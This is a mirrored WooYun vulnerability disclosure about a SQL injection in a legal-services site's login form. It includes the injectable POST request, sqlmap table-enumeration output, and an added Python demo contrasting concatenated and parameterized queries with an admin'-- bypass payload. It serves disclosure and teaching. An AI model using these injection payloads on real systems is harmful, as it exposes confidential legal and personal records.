WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-09-15: Details reported to the vendor, awaiting vendor handling
2015-09-17: CNCERT (National Internet Emergency Center) could not yet reach the responsible unit; details disclosed only to the reporting agency
2015-09-27: Details disclosed to core white hats and relevant domain experts
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public

A POST-based SQL injection in the login form yields a large amount of lawyer information, together with case review and case progress details.
Request (the uid parameter is injectable; host redacted in the original):

POST / HTTP/1.1
Host:
Content-Length: 220
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: .ASPXANONYMOUS=JWdAjpwf0QEkAAAAZDk2ZTJjOTgtYTU1Zi00MmNlLTk4MTMtZWRiM2EyNjZhMjgxFsQxy1kHikbdBFV4AjHoWR05BnYhOXkBdMrUzVLTtB81

__VIEWSTATE=%2FwEPDwULLTE0NDk3NTA4MzhkZFEtiL5ueyFL8bbJtX3FtxbYqoCfVBddg7xgRmd2dWFN&__EVENTVALIDATION=%2FwEdAAInt7ld8w4GtN3BLF9fjQIJRW4FbNZ7jLxhpNVSYZjUNYFhj9jDwpjFOf24vTgGGpsRSF1vMMik4KvvPgaNruTk&uid=a%27+&pwd=aaaa&_key=

sqlmap output (table enumeration):

[11:10:15] [INFO] the SQL query used returns 54 entries
Database: Osgscn
[54 tables]
+------------------+
| Day_Work         |
| ERP_Class        |
| ERP_Message      |
| ERP_User         |
| ERP_User_Log     |
| FL_Class         |
| FL_Dq            |
| FL_Info          |
| FL_Key           |
| IOS_DB           |
| IOS_Group_List   |
| IOS_Group_User   |
| IOS_Note         |
| IOS_User         |
| IOS_User_Group   |
| IOS_Wrok         |
| IOS_anli         |
| IOS_anli_gd      |
| IOS_del          |
| IOS_pics         |
| Ios_ShiWiSo      |
| Ios_YJ           |
| Ios_add_Log      |
| Ios_anli_class   |
| Ios_baoqian      |
| Ios_money        |
| LS_DQ            |
| Law_Ask          |
| Law_Class        |
| Law_Good         |
| Law_Gust         |
| Law_Join         |
| LogList          |
| OA_Menu          |
| Play_anli        |
| Play_anli_Gd     |
| Play_anli_user   |
| QX_Group         |
| Sou_Hot          |
| User_Access      |
| anil_baoqi_3     |
| anli_3           |
| anli_Falg        |
| anli_Falg_Log    |
| anli_OA_files    |
| anli_class_3     |
| anli_faguan_3    |
| anli_files_3     |
| anli_log_3       |
| anli_tixin_3     |
| anli_work_3      |
| anli_work_list_3 |
| doin_3           |
| money_lx         |
+------------------+
[11:10:15] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\**.**.**.**'

[*] shutting down at 11:10:15

C:\Python27\sqlmap>
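The injection the report describes is a single quote in the uid field of an ASP.NET login form (uid=a%27+ decodes to "a' "). The script below is an added illustration, not code from the report or from the affected site: it models the assumed vulnerable string-concatenated login query next to a parameterized version, against an in-memory SQLite database with constructed rows. The table name ERP_User is taken from the sqlmap listing and the columns uid/pwd from the POST body; the rows, the login functions and the admin'-- bypass payload are assumptions that go beyond what the report shows.

```python
import sqlite3

# Constructed sample data standing in for the site's user table. The real
# schema is not on the page; ERP_User comes from the sqlmap listing, uid/pwd
# from the POST body, and the rows are invented for this example.
SAMPLE_USERS = [("admin", "s3cret"), ("lawyer1", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ERP_User (uid TEXT NOT NULL, pwd TEXT NOT NULL)")
    conn.executemany("INSERT INTO ERP_User VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, uid, pwd):
    """Assumed vulnerable pattern: form fields are concatenated into the SQL
    text, so a quote in uid closes the literal and the rest is parsed as SQL."""
    sql = "SELECT COUNT(*) FROM ERP_User WHERE uid='%s' AND pwd='%s'" % (uid, pwd)
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, uid, pwd):
    """Hardened form: bound parameters, so the input can only ever be a value."""
    sql = "SELECT COUNT(*) FROM ERP_User WHERE uid=? AND pwd=?"
    return conn.execute(sql, (uid, pwd)).fetchone()[0] > 0


def probe(conn, login, uid, pwd):
    """Run one login attempt and report ('ok', bool) or ('error', message).
    A database error on a lone quote, versus a clean False, is the first
    signal an injection scanner such as sqlmap keys on."""
    try:
        return ("ok", login(conn, uid, pwd))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        # The report's probe value: a quote followed by a space.
        print(name, "uid=a' ->", probe(conn, fn, "a' ", "aaaa"))
        # Classic bypass (assumed, not shown in the report): the SQL comment
        # marker discards the AND pwd=... clause in the concatenated query.
        print(name, "uid=admin'-- ->", probe(conn, fn, "admin'-- ", "wrong"))
```

The concatenated query turns the page's probe into a syntax error, which is exactly the behaviour sqlmap goes on to exploit; the parameterized query treats the same bytes as an unknown username and simply returns False. Fixing this class of bug on an ASP.NET site means using SqlParameter (or an ORM) for every user-supplied value, not filtering quotes.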
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-09-17 16:57
CNVD confirmed and reproduced the reported issue; it has been passed via CNCERT to the Guangdong branch center, which will coordinate remediation with the website's operating unit.
None yet